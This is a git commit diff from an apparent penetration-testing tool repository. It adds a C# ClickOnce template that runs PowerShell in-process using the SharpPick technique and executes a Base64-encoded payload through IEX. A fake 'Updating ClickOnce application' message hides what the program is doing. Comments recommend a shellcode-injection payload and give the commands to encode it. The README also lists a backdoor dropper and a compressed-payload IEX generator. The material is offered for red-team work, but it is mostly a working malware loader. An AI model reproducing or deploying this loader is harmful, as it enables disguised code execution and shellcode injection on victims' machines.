Added ClickOnce SharpPick template.
This commit is contained in:
parent
cc5ba84532
commit
c52a66f3c9
|
@ -4,6 +4,8 @@
|
|||
|
||||
- **`backdoor-drop.js`** - Internet Explorer - JavaScript trojan/backdoor dropper template, to be used during Penetration Testing assessments. ([gist](https://gist.github.com/mgeeky/b0aed7c1e510560db50f96604b150dac))
|
||||
|
||||
- **`clickOnceSharpPickTemplate.cs`** - This is a template for **C# Console Project** containing [SharpPick](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) technique of loading Powershell code from within C# application. The ClickOnce concept is to generate a windows self-updating Application that is specially privileged ([ClickOnce](https://www.slideshare.net/NetSPI/all-you-need-is-one-a-click-once-love-story-secure360-2015))
|
||||
|
||||
- **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX)
|
||||
. ([gist](https://gist.github.com/mgeeky/e30ceecc2082a11b99c7b24b42bd77fc))
|
||||
|
||||
|
|
|
@ -0,0 +1,69 @@
|
|||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
using System.IO;
|
||||
using System.Resources;
|
||||
using System.Net;
|
||||
|
||||
using System.Collections.ObjectModel;
|
||||
|
||||
//
|
||||
// Use NuGet to install System.Management.Automation reference.
|
||||
//
|
||||
using System.Management.Automation;
|
||||
using System.Management.Automation.Runspaces;
|
||||
|
||||
namespace ConsoleApplication2
|
||||
{
|
||||
class Program
|
||||
{
|
||||
//
|
||||
// This function and concept comes from PowerPick / SharpPick project by Sixdub:
|
||||
// https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick
|
||||
//
|
||||
static string RunPS(string cmd)
|
||||
{
|
||||
// Init stuff
|
||||
Runspace runspace = RunspaceFactory.CreateRunspace();
|
||||
runspace.Open();
|
||||
RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
|
||||
Pipeline pipeline = runspace.CreatePipeline();
|
||||
|
||||
// Add commands
|
||||
pipeline.Commands.AddScript(cmd);
|
||||
|
||||
// Prep PS for string output and invoke
|
||||
pipeline.Commands.Add("Out-String");
|
||||
Collection<PSObject> results = pipeline.Invoke();
|
||||
runspace.Close();
|
||||
|
||||
// Convert records to strings
|
||||
StringBuilder stringBuilder = new StringBuilder();
|
||||
foreach (PSObject obj in results)
|
||||
{
|
||||
stringBuilder.Append(obj);
|
||||
}
|
||||
return stringBuilder.ToString().Trim();
|
||||
}
|
||||
|
||||
static void Main()
|
||||
{
|
||||
Console.WriteLine("Updating ClickOnce application. Please wait...");
|
||||
|
||||
//
|
||||
// Here comes your Base64 encoded Powershell payload.
|
||||
// A good example of what to stick in here is a modified Invoke-Shellcode.ps1
|
||||
// that will spawn a process and insert there some shellcode.
|
||||
// You can prepare Base64 UTF8 shellcode via:
|
||||
// PS> $text = Get-Content yourShellcode.ps1
|
||||
// PS> $bytes = [System.Text.Encoding]::Unicode.GetBytes($text);
|
||||
// PS> $encoded = [Convert]::ToBase64String($bytes);
|
||||
// PS> $encoded | Out-File "myEncodedShellcode.ps1"
|
||||
//
|
||||
String base64encodedPayload = "<INSERT HERE YOUR BASE64 ENCODED POWERSHELL PAYLOAD>";
|
||||
|
||||
RunPS("IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"" + base64encodedPayload + "\")))");
|
||||
}
|
||||
}
|
||||
}
|
Loading…
Reference in New Issue